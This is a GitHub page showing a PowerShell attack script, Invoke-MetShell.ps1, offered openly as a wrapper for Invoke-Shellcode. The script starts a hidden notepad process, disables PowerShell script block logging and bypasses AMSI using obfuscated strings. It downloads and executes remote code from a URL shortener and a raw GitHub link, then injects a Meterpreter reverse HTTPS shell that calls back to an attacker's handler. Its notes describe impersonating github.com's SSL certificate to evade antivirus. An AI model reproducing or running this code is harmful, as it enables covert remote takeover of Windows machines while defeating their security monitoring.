forked from b4rtik/PowerTheShell
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathInvoke-MetShell.ps1
More file actions
103 lines (89 loc) · 4.93 KB
/
Invoke-MetShell.ps1
File metadata and controls
103 lines (89 loc) · 4.93 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
function Invoke-MetShell
{
<#
.SYNOPSIS
A wrapper for the well known Invoke-Shellcode. Spawn a win32 notepad hidden process, check the
architecture of the curret PowerShell session and the spawn a Win32 Powershell if needed to inject
the shellcode.
.DESCRIPTION
Author: @b4rtik
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.PARAMETER lhost
Address of the handler.
.PARAMETER lport
Port of the handler.
.EXAMPLE
C:\PS> Invoke-MetShell -lhost 192.168.1.5 -lport 443
.NOTE
First of all we need a cert to evade some AV with https.
auxiliary/gather/impersonate_ssl
Module options (auxiliary/gather/impersonate_ssl):
Name Current Setting Required Description
---- --------------- -------- -----------
ADD_CN no Add CN to match spoofed site name (e.g. *.example.com)
CA_CERT no CA Public certificate
EXPIRATION no Date the new cert should expire (e.g. 06 May 2012, YESTERDAY or NOW)
OUT_FORMAT PEM yes Output format (Accepted: DER, PEM)
PRIVKEY no Sign the cert with your own CA private key
PRIVKEY_PASSWORD no Password for private key specified in PRIV_KEY (if applicable)
RHOSTS www.github.com yes The target address range or CIDR identifier
RPORT 443 yes The target port (TCP)
exploit/multi/handler
Payload options (windows/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.5 yes The local listener hostname
LPORT 443 yes The local listener port
LURI no The HTTP Path
2 Advanced options must be set
msf5 exploit(multi/handler) > set handlersslcert ./20180929121944_default_192.30.253.112_www.github.com_p_690232.pem
handlersslcert => ./20180929121944_default_192.30.253.112_www.github.com_p_690232.pem
msf5 exploit(multi/handler) > set stagerverifysslcert true
stagerverifysslcert => true
#>
[CmdletBinding()]
param (
[Parameter(Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true)]
[string]
$lhost = '127.0.0.1',
[Parameter(Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true)]
[ValidateRange( 1,65535 )]
[Int]
$lport = "443"
)
$procId = Run-Proc
if ($env:Processor_Architecture -ne "x86")
{
write-warning 'Run command in x86 context'
#Use start-job instead of the classic Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe for Symantec evasion
#same reason for shortner url and wrapper to Invoke-....
#AMSI evasion and script block logging by-pass have to be repeated hear becouse script block will run in new context
$job = start-job -scriptblock {
$settings = [Ref].Assembly.GetType("System.Management.Automation.Utils")."GetFie`ld"("cachedGroupPolicySettings","NonPu"+"blic,Static").GetValue($null);
$settings['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Scr'+'iptB'+'lockLo'+'gging'] = @{}
$settings['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Scr'+'iptB'+'lockLo'+'gging'].Add('EnableScr'+'iptBlockLogging',"0")
$settings['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Scr'+'iptB'+'lockLo'+'gging'].Add('EnableScri'+'ptBlockInvoca'+'tionLogging',"0")
[Ref].Assembly.GetType("System.Management.Automation.ScriptBlock")."GetFie`ld"("signatures","NonPub"+"lic,static").SetValue($null, (New-Object 'System.Collections.Generic.HashSet[string]'))
[Ref].Assembly.GetType('System.M'+'ana'+'gement.Automation.A'+'msi'+'Uti'+'ls')."GetFie`ld"('ams'+'iIni'+'tFa'+'iled','NonPublic,Static').SetValue($null,$true);
iex((New-Object system.net.webclient).DownloadString('https://goo.gl/ks6EMR'));
Invoke-Mycode -ProcessId $args[0] -Lhost $args[1] -Lport $args[2];
} -ArgumentList @($procId, $lhost, $lport) -RunAs32
}
else
{
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/b4rtik/PowerTheShell/master/Scripts/Invoke-ShellCode.ps1'))
Invoke-Shellcode -ProcessId $procId -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Verbose -Force
}
}
function Run-Proc
{
$startinfo = New-Object System.Diagnostics.ProcessStartInfo
$startinfo.FileName = "C:\Windows\SysWOW64\notepad.exe"
$startinfo.WindowStyle = 'Hidden'
$startinfo.CreateNoWindow = $True
$Proc = [Diagnostics.Process]::Start($startinfo)
return $Proc.id
}